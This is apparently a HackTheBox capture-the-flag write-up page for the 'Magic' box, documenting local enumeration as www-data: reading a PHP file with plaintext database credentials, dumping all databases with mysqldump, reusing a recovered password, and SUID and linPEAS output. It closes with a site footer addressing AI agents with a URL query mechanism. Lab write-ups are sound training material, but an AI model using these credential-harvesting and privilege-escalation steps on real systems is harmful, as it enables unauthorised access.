# 3 box enum www-data

```
www-data@ubuntu:/var/www/Magic$ cat db.php5
<?php
class Database
{
    private static $dbName = 'Magic' ;
    private static $dbHost = 'localhost' ;
    private static $dbUsername = 'theseus';
    private static $dbUserPassword = 'iamkingtheseus';

# mysql is not installed?
# tried su didnt work

www-data@ubuntu:/tmp$ cat /etc/passwd | grep sh
root:x:0:0:root:/root:/bin/bash
theseus:x:1000:1000:Theseus,,,:/home/theseus:/bin/bash

# mysqldump exists

www-data@ubuntu:/tmp$ mysqldump -u theseus -p --all-databases> dump.mysql

# from dump.mysql
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
# theseus:Th3s3usW4sK1ng works
```

## SuidEnum

```
[~] Custom SUID Binaries (Interesting Stuff)
------------------------------
/bin/sysinfo
------------------------------

ls -la /bin/sysinfo
-rwsr-x--- 1 root users 22040 Oct 21  2019 /bin/sysinfo
# we need to become theseus to use SUID
```

## PEAS

```
╣ Sudo version
Sudo version 1.8.21p2
# tried; not exploitable

╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus
NAME                                       PID PROCESS         USER             CONNECTION    UNIT                      SESSION    DESCRIPTION
org.gnome.DisplayManager                  1082 gdm3            root             :1.18         gdm.service               -          -
 -- UID=0 EUID=0

╣ Active Ports
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      -

╣ Users with console
root:x:0:0:root:/root:/bin/bash
theseus:x:1000:1000:Theseus,,,:/home/theseus:/bin/bash
uid=1000(theseus) gid=1000(theseus) groups=1000(theseus),100(users)
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://kashz.gitbook.io/hackthebox-writeups/htb-boxes/magic/3-box-enum-www-data.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.